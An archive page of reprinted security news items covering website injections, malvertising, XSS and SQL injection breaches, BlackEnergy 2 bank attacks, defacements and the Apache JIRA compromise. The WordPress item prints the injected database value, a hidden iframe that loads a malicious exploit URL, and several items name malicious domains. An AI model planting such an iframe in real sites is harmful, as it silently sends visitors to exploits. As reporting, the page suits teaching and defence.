CyberInsecure.com

Archive for the ‘Targeted Attacks’ Category

Security researchers warn that a new mass injection attack affecting websites hosted at Rackspace and Media Temple. The compromises result in rogue JavaScript code being added to legit .js files used by the affected websites.

The new attack was reported by Denis Sinegubko, the creator of the Unmask Parasites website scanner. “Right before this week-end I noticed an increased number of sites hosted on MediaTemple and RackSpace coming to Unmask Parasites with the same problem — their sites are blocked by Google and their diagnostic pages mention the following five domains: ‘myads .name’, ‘adsnet .biz’, ‘toolbarcom .org’, ‘mybar .us’, ‘freead .name’,” the Web security expert notes.

What’s rather unusual about this attack is that the malicious code is not necessarily inserted into the .html files or .php scripts. In fact, this is hardly the case. Instead, the attackers add the rogue code to static .js files that already exist on the server.

Another noteworthy aspect of these injections is that the malicious JavaScript snippet is not added on new lines in the tainted files. It’s actually prepended to the first line in the document, making automatic removal a bit harder, since removing the entire line would also break the legit code. According to Sinegubko, automatic cleaning scripts should not remove stuff after “this.O=58441;var gr0=0;”.

The rogue JavaScript first performs a check to see if the visitor is a search engine crawler or a real user. The malicious payload will not be served to search engine bots. Real visitors will also only be targeted once after which a cookie will be set in their browser preventing them from being attacked in the future. There’s obviously no point in trying to re-infect a user that’s already been infected or on who’s computer the exploit failed.

The attackers serve the payload from multiple websites, most likely for redundancy and to make filtering harder. The rogue code will calculate a URL and load the malicious content from it. Sinegubko explains that there are 5 domains and 36 subdomain variations on each. That means 180 possible malicious URLs.

Websites hosted at both companies have been targeted in mass injections attacks before. However, their security staff haven’t found any particular vulnerability being exploited or any security hole in their own infrastructure. The Unmask Parasites creator suggests that this might be related to overly generous file permissions. He suggests changing the permissions of static static content files like .js, which hardly even get modified to 444 or even 400, if the Web app doesn’t need to change them either.

Credit: Softpedia.com News

A malvertising attack targeted TweetMeme.com users today after a rogue advertiser made its way onto the website. The malicious advertisements directed user to third party websites displaying fake malware alerts with the purpose of convincing users to install scareware.

Malvertising (malicious advertising) is a type of attack where cyber crooks manage to insert rogue ads that lead users to malicious content into a legit website. The practice is commonly employed by scareware pushers to distribute their fake antivirus products.

According to StopMalvertising, a website dedicated to researching and stopping such attacks, TweetMeme users were targeted via malicious advertisements served by a rogue advertiser at y5-media.com. An investigation of the incident revealed that the threat distributed through these malvertisements was a fake antivirus called Security Threat Analysis.

The researchers explain that requests to y5-media.com bounce through two other websites before landing on the scareware domains. In order to fly under the radar the cyber crooks tried to make the attack as subtle as possible.

“Both domains perform various checks to see whether you’re a bot, a search engine, a proxy … as in those cases the redirect to the scareware will not happen,” the researchers explain. Also, if a user visits the malicious websites once, a cookie is added in his browser to prevent him from being targeted again.

The landing websites at www3.luckfind42td.in and www2.guardhere5.in, display the typical fake malware scans associated with scareware scams. When these scans are “done” the users are taken to another domain called www1.wareforyou10.in, which serves a file called packupdate107_302.exe for download. This is a program in the FakeAV family of malware, which currently has a very low AV detection rate.

Malvertisements can be very dangerous, because unlike black hat search optimization campaigns that poison search results with malicious links, they can are a lot harder to detect, and abuse the trust that users put into legit websites. Popular websites that were previously affected by similar attacks include the New York Times, Gizmodo or Digital Spy.

Credit: Softpedia.com News

The Pirate Bay has been compromised by an Argentinean hacker who made off with usernames, email and internet addresses of more than four million people signed up to the BitTorrent tracker site.

KrebsOnSecurity.com reported yesterday that Ch Russo broke into TPB’s system and grabbed the info from the notorious website, which might amuse some pro-copyright groups.

Russo had considered selling the private data, but in the end decided to go public about TPB’s shaky security credentials. He accessed the information via the site’s user database by exploiting its weakness to SQL injections.

“We wanted to tell people that their information may not be so well protected,” Russo said.

Meanwhile, it may be a coincidence, but The Pirate Bay is currently out of action and carried the following message:

“Upgrading some stuff, database is in use for backups, soon back again.. Btw, it’s nice weather outside I think.”

At this moment the website appears to be offline.

Credit: The Register

Hackers and pranksters began exploiting a newly discovered scripting flaw on YouTube on Sunday, provoking rumours that a virus was spreading on the site.

The cross-site scripting flaw (XSS) on the video-sharing website created a means for hackers to post JavaScript code in the comments sections of videos. The flaw meant that this JavaScript code was run on the machines of surfers viewing the same video clip.

Predictable enough, pranksters at 4Chan have begun using the vulnerability to redirect surfers looking for Justin Bieber video clips to goatse or false reports that the irksomely clean-cut Canadian singer had died in a car crash. Denizens of 4Chan are separately trying to rig an online poll to encourage Beiber to play North Korea in an upcoming tour.

In other cases the flaw has become the fodder of comment spam. Google iced the problem hours after it first appeared, techie-buzz.com reports.

“We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago,” said Google. “Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.”

The appearance of the vulnerability sparked rumours on Twitter and elsewhere that a virus was spreading across YouTube. A blog post by Chris Boyd of Sunbelt charts the genesis of this rumour, which is just the sort of thing that’s likely be used in new anti-virus (scareware) scams.

Security watchers at the Internet Storm Centre note that the vulnerability on YouTube might potentially have been used for all manner of hacking attacks, including password stealing scams.

“They [hackers] could steal your YouTube cookies, which probably doesn’t mean much to them, but they could also post various JavaScript code that will execute in your browser, in the context of YouTube,” an ISC handler writes. “I’ve seen nasty XSS attacks that are used to fake whole login screens and we know how many people use [the] same passwords for multiple accounts.”

Credit: The Register

Banks in Russia and Ukraine are under continued siege by criminal gangs wielding a sophisticated, next-generation exploitation kit that hacks the financial institutions’ authentication system and then hits it with a denial-of-service attack.

The attacks are being carried out with the help of a top-to-bottom revision of BlackEnergy, a popular hack-by-numbers toolkit that until recently was used primarily to launch DDoS, or distributed denial-of-service, attacks. Eastern European criminal gangs are using the expanded capabilities of BlackEnergy 2 to siphon funds out of electronic bank accounts and then assault the financial institutions with more data than they can handle, said Joe Stewart, a researcher with security firm SecureWorks’ Counter Threat Unit.

The attacks, which also use a BlackEnergy 2 module to bypass a Java-based application the banks use to authenticate customers online, began near the end of 2009. They show no signs of letting up, said Stewart, who observed the same modus operandi earlier this week.

“Over the months that I’ve been monitoring this botnet, it’s attacked probably a dozen or more banks with the same type of pattern of attacking the java authentication app,” Stewart told The Register. “All we see is, yes, this group has the plug-in that does the banking theft and then we see them also hacking that same banking authentication with the DDoS attack.”

BlackEnergy came to prominence in 2008 when it was reportedly used to disrupt internet communications in Georgia during the armed conflict between the former Soviet republic and Russia. It quickly became a major staple among Eastern European thugs, selling online for about $40 until free, pirated copies became widely available.

BlackEnergy 2, which Stewart first began monitoring in 2009, greatly expands what the software can do. It brings modular functionality to the tool, so separate programmers can write plug-in programs in much the way developers do for the Firefox browser. The gangs Stewart is monitoring are combining BlackEnergy’s core DDoS functionality with an add-on to hack the Java authentication application, said Stewart, who presented his findings at this week’s FIRST, or Forum of Incident Response and Security Team, conference in Miami.

“It’s a good technique to keep [bank employees] distracted while they get the money moved out,” Stewart said. It also “keeps people whose money is in transfer from logging on and seeing what’s happening.”

Bank customers victimized in the attacks are being targeted by trojans disguised as pay-per-install applications

In a major break from previous methods, the gangs are exclusively attacking banks in Russia and Ukraine. Previously, they went out of their way to avoid attacking banks in the region, presumably out of fear of attracting attention of law enforcement agents in the criminals’ own backyard. Stewart said he’s seen at least two unrelated bank fraud scams exclusively targeting banks in Russia and Ukraine, including the Bredavi trojan.

Credit: The Register

A subtle defacement of the website of electronics manufacturer Foxconn has drawn further attention to an alarming spate of worker suicides at a plant in southern China.

Nine of the workers at a Shenzen plant where iPhones and other hi-tech kit is assembled have killed themselves this year, with a further two unsuccessful suicide attempts. In a satirical response, Foxconn’shuman resources site was hacked with a spoof ‘We’re Hiring’ notice.

A translation of the Chinese-language defacement by Shanghaiist reads:

Foxconn — We’re Hiring

Are you feeling down today? Do you feel like not living anymore? Do you want to know what it feels like to jump down from China’s model suicide jumping facility? Foxconn provides you the perfect environment to jump.

All the many reasons to jump here have ensured at least one jump per week.

Comprehensive press coverage guaranteed. to ensure your name travels ten thousand miles.

What are you waiting for? Pick up your phone now and join Foxconn.

Be the kickass twelfth jumper.

You can do it.

Hiring hotline: 514514514

The number “514″ that is repeated three times in the “hiring hotline” sounds like the Chinese for “I want to die”, Shanghaiist (via fastcompany.com) adds. The defacement itself was not on the home page of Foxconn’s site.

It’s unclear who tampered with the site, much less how they posted the spoof notice but it’s safe to say that the hack was much more subtle and sophisticated than the great majority of defacements. The site runs IIS 5 on a Windows 2000 platform.

Meanwhile, back in the real world, the head of Foxconn hosted international journalists on a tour of the controversial Shenzen facility where 300,000 live and work on Tuesday as part of a bid to assuage suspicions that workers at the factory are being ill-treated. Attempts to paint the facility in a favourable light have not been helped by local reports that workers are getting asked to sign promises not to kill themselves or that the firm has placed safety nets around high buildings in order to prevent staff jumping to their deaths, the BBC reports.

Apple, Dell and Hewlett-Packard all said they were investigating working conditions at Foxconn, the Financial Times adds.

Credit: The Register

Carders.cc, a German online forum dedicated to helping criminals trade and sell financial data stolen through hacking, has itself been hacked. The once-guarded contents of its servers are now being traded on public file-sharing networks, leading to the exposure of potentially identifying information on the forum’s users as well as countless passwords and credit card accounts swiped from unsuspecting victims.

The breach involves at least three separate files being traded on Rapidshare.com: The largest is a database file containing what appear to be all of the communications among nearly 5,000 Carders.cc forum members, including the contents of private, one-to-one messages that subscribers to these forums typically use to negotiate the sale of stolen goods. Another file includes the user names, e-mail addresses and in many cases the passwords of Carder.cc forum users.

A third file — which includes what appear to be Internet addresses assigned to the various Carders.cc users when those users first signed up as members — also features a breezy explanation of how the forum was compromised. The top portion of this file — which is accompanied by an ASCII art picture of a cat — includes an oblique reference to the party apparently responsible for the Carders.cc site compromise, noting that the file is the inaugural issue of Owned and Exposed, no doubt the first of many such “e-zines” to come from this group.

Ironically, the anonymous authors of the e-zine said they were able to compromise the criminal forum because its operators had been sloppy with security. Specifically, they claimed, the curators of Carders.cc had set insecure filesystem permissions on the Web server, which essentially turned what might have been a minor site break-in into a total database compromise. From the e-zine’s opening salvo:

Many of you guys may have noticed this breeding German “underground” shit called carders.cc. For those who don’t: Carders is a marketplace full of everything that is illegal and bad. Carding, fraud, drugs, weapons and tons of kiddies. They used to be only a small forum, but after we erased 1337-crew they got more power. The rats left the sinking ship. The voices told us to own them since carders is our fault and we had to fix our flaw. So we did.

During the ownage they also gave us lulz by showing off their ridiculous configuration skills which had a specific impact on their security. They actually managed to chmod and chown nearly everything to 777 and www-user readable. Including their /root directory.

On the surface, it’s tempting to grin at the misfortune of these fraudsters. Still, the leaked database contains no small amount of password and banking information for many innocent victims. In addition, these types of vigilante attacks typically come with hidden costs: For one thing, while it may be true that law enforcement officials could use some of this information to locate people engaged in computer trespass, and buying or selling stolen personal and financial data, the public release of this information could just as easily prompt those individuals to abandon those accounts and Internet addresses, and even potentially jeopardize ongoing investigations.

Credit: KrebsOnSecurity.com

Two websites hosted on the telegraph.co.uk domain were defaced to display Romanian patriotic messages and the country’s flag, yesterday. The hacktivists who claimed responsibility for the attack expressed anger at the British media for portraying the Romanian people in an unfavorable light.

The attack targeted the wine-and-dine.telegraph.co.uk and shortbreaks.telegraph.co.uk websites and was originally reported on the Romanian Security Team (RST) hacking forum. However, according to the message left behind on the affected websites, the compromise is attributed to a group called Romanian National Security (R.N.S.).

It seems that both of the affected subdomains were being used for Daily Telegraph promotions. “With the Telegraph’s Wine and Dine for only £10 offer enjoy two courses and a glass of Bordeaux for only £10 at more than 600 restaurants and pubs,” reads a Google cached summary for wine-and-dine.telegraph.co.uk. Meanwhile, shortbreaks.telegraph.co.uk seems to correspond to a campaign, which allows readers to “save up to 50% at more than 400 hotels throughout the British isles.”

There is a strong possibility that the Daily Telegraph was targeted as a representative of the entire British media, because the hackers were a lot broader in their accusations. “We’re tired of sitting and watching how ’scum’ like you mock our country. Of the picture you paint of us, and which has nothing to do with reality, by calling us ‘Romanian gypsies’ and by airing [expletive] shows like TopGear. For having the nerve to step on the toes of an entire country, be warned that we will not stop here!,” they wrote [human translation from Romanian], before ending their statement with “Guess what, gypsies aren’t Romanians, morons.”

The TopGear reference concerns the first episode of the series’ 14th season, which follows the TopGear team in its quest to locate and drive along the Romanian Transfagarasan highway, one of the most dramatic paved roads in Europe. Unfortunately, the segment contains some rather unflattering remarks about the Eastern European country and its people.

The irony of this attack is while the hacktivists condemn ethnic discrimination - treating Romanians differently because of their nationality - it goes on to indirectly discriminate gypsies (Romani people) by suggesting that being a member of that ethnic group is a bad thing.

At the time of writing this article, only the shortbreaks.telegraph.co.uk defacement was still live. A song called The Lonely Sheppard, played by world-renowned Romanian pan flute master Gheorghe Zamfir, loads in the background.

Credit: Softpedia.com News

The Apache Software Foundation (ASF) announces that several of its services were targeted in a complex attack that led to a server being completely hacked and another partially compromised. A considerable number of possibly insecure password hashes have also been lifted from the organization’s systems.

The attack started on April 5 when someone created a fake error report in JIRA, a proprietary project management solution developed by a company called Atlassian and used by the ASF. The rogue entry contained a TinyURL-shortened link, which, if opened, exploited an undisclosed JIRA cross-site scripting (XSS) vulnerability to steal session cookies for logged in users.

“When this issue was opened against the Infrastructure team, several of our administrators clicked on the link. This compromised their sessions, including their JIRA administrator rights,” Philip Gollucci, the foundation’s vice president in charge of infrastructure, explained. He also noted that, at the same time, the JIRA login page was subjected to a brute force password guessing attack.

After obtaining a set of valid administrative credentials for the project management system, the attackers located a writable directory on the server and used it to execute malicious scripts. This allowed them to install a password logging component and capture additional JIRA logins.

“One of these passwords happened to be the same as the password to a local user account on brutus.apache.org, and this local user account had full sudo access. The attackers were thereby able to login to brutus.apache.org, and gain full root access to the machine. This machine hosted the Apache installs of JIRA, Confluence, and Bugzilla,” Mr. Gollucci said.

Furthermore, using cached SVN passwords found on the “rooted” server, the attackers managed to log into several limited shell accounts on minotaur.apache.org. This server, which is also known as people.apache.org, hosts accounts for all Apache developers and was the target of a different attack in August last year. Fortunately, the attackers did not manage to escalate the privileges on this machine as well.

Users of Apache Foundation’s JIRA, Bugzilla and Confluence (wiki) systems, all running on the compromised server, are advised that their passwords could be recovered from the stolen hashes. JIRA users in particular, who logged in between April 6 and April 9, should consider their passwords already compromised as they were logged via the login form.

Apache.org’s infrastructure team has already taken several steps to prevent similar attacks in the future and the response received from the community so far is overwhelmingly positive. The majority of users congratulate the organization for its openness when dealing with incidents such as this one.

Credit: Softpedia.com News

Hundreds of WordPress-powered blog owners have recently found their websites inaccessible after a critical value has been altered in the database. The attack seems to affect even the latest version of the popular blog platform and, so far, the entry point has not been determined.

Sucuri Security Labs, a provider of Web-based integrity monitoring, reports that a worrying number of blogs were compromised the last week, in an attempt to silently redirect visitors to a malicious URL loading exploits. According to the company, most of the affected sites are hosted at Network Solutions.

The common symptom of the hack is an altered “siteurl” value in the “wp_options” database table. This variable should normally contain the main URL of the website, however, on affected installations, it is modified to a rogue <iframe> element pointing to a http://networkads.net/grep/ [don't open].

That’s how it looks like in the database:

(2, 0, ’siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Since “siteurl” is not supposed to hold HTML code, this modification breaks the entire blog layout and prevents users and admins alike from reaching the website. The unusual technique suggests that the attackers are amateurs and not particularly familiar with the intricacies of the WordPress platform.

Another interesting aspect is that no one has successfully pinpointed the entry point used by the attackers, which could be either an unidentified security hole in WordPress or a common plug-in. “The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases,” David Dede, a security researcher with Sucuri, said, however, no suspicious activity is registered in the access logs.

Shashi Bellamkonda, head of social media strategy at Network Solutions, challenged the idea that only blogs hosted with Network Solutions were affected. “Its not accurate to say that this affects only Network Solutions customers. It seems like there have been a spate of these attacks over the past few weeks,” he wrote in response to Sucuri’s report.

Fixing the rogue “siteurl” entry from the database might not be enough to mitigate this problem, as a lot of webmasters reported their blogs getting reinfected. It is also recommended to manually override the “siteurl” value via the wp_config.php.

To fix this issue, just revert your siteurl back to the previous value. Log in to your control panel, go to manage database, and edit the siteurl value on the wp-option table.

Update: It seems that a malicious user employed a script that automatically scoured the Network Solutions system for poorly secured accounts and, when found, modified the databases so the corresponding websites redirected users to the malicious website. The mass hack caused Network Solutions customers running WordPress to silently redirect visitors to malicious sites. Network Solutions has now closed the hole by resetting database passwords for the blogging software, the company said Sunday. Users should also review their settings for any administrative access accounts that aren’t recognized and if found delete them.

Credit: Softpedia.com News